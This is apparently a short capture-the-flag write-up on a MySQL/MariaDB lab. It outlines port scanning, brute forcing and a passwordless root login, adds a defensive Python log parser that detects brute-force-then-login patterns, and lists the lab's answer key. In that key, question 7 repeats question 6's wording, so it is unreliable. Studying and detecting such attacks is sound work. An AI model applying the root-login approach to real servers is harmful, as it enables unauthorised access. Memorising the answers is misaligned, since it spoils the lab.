It has been a long time since my last update, so today I am back with another filler post, even though nobody reads them, hh.
1. Every time you are only given an IP address, the only place to start is nmap.
2. Only port 3306 is open. Without further ado, start by brute-forcing weak passwords.
3. Brute force turned up nothing, emm, so try connecting directly instead.
4. Went straight in and the flag is in hand.
5. Questions and answers
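The steps above (a burst of failed MySQL logins from one host, then a successful connection from the same host) are exactly what a defender would want to catch in the server's logs. The following is an added example that is not part of the original post: it parses constructed log lines written in the style of MariaDB's error log ("Access denied") and general log ("Connect") entries, with made-up hosts, users and timestamps, and flags hosts whose failed attempts are followed by a login.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines modelled on MariaDB's error log ("Access denied")
# and general log ("Connect") entries. Hosts, users and times are made up,
# and both kinds are merged into one stream with the same timestamp format.
SAMPLE_LOG = """\
2024-03-01 10:00:01 12 [Warning] Access denied for user 'root'@'10.0.0.5' (using password: YES)
2024-03-01 10:00:01 13 [Warning] Access denied for user 'root'@'10.0.0.5' (using password: YES)
2024-03-01 10:00:02 14 [Warning] Access denied for user 'admin'@'10.0.0.5' (using password: YES)
2024-03-01 10:00:02 15 [Warning] Access denied for user 'root'@'10.0.0.5' (using password: YES)
2024-03-01 10:00:03 16 [Warning] Access denied for user 'root'@'10.0.0.5' (using password: YES)
2024-03-01 10:00:09 17 Connect root@10.0.0.5 on  using TCP/IP
2024-03-01 10:05:00 18 [Warning] Access denied for user 'root'@'10.0.0.9' (using password: YES)
2024-03-01 10:05:30 19 Connect backup@10.0.0.9 on  using TCP/IP
"""

DENIED = re.compile(r"^(\S+ \S+) \d+ \[Warning\] Access denied for user '([^']*)'@'([^']*)'")
CONNECT = re.compile(r"^(\S+ \S+) \d+ Connect (\S+?)@(\S+) on")


def parse(lines):
    """Yield (time, kind, user, host) for the two event kinds we care about."""
    for line in lines:
        for kind, rx in (("denied", DENIED), ("connect", CONNECT)):
            m = rx.match(line)
            if m:
                ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
                yield ts, kind, m.group(2), m.group(3)
                break


def find_bruteforce_logins(log_text, threshold=4, window=timedelta(seconds=60)):
    """Return {host: user} for hosts that accumulated >= threshold denials
    inside `window` and then opened a successful connection within it.
    A single stray failure (10.0.0.9 in the sample) is not reported."""
    denials = defaultdict(list)
    hits = {}
    for ts, kind, user, host in parse(log_text.splitlines()):
        if kind == "denied":
            denials[host].append(ts)
            continue
        recent = [t for t in denials[host] if ts - t <= window]
        if len(recent) >= threshold:
            hits[host] = user
    return hits


if __name__ == "__main__":
    print(find_bruteforce_logins(SAMPLE_LOG))  # {'10.0.0.5': 'root'}
```

Hosts that only guess and never get in are still worth alerting on, but the combination above is the one that maps to this room's storyline.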
1.What does the acronym SQL stand for?
-> Structured Query Language
2.During our scan, which port running mysql do we find?
-> 3306
3.What community-developed MySQL version is the target running?
-> MariaDB
4.What switch do we need to use in order to specify a login username for the MySQL service?
-> -u
5.Which username allows us to log into MariaDB without providing a password?
-> root
6.What symbol can we use to specify within the query that we want to display everything inside a table?
-> *
7.What symbol can we use to specify within the query that we want to display everything inside a table?
-> ;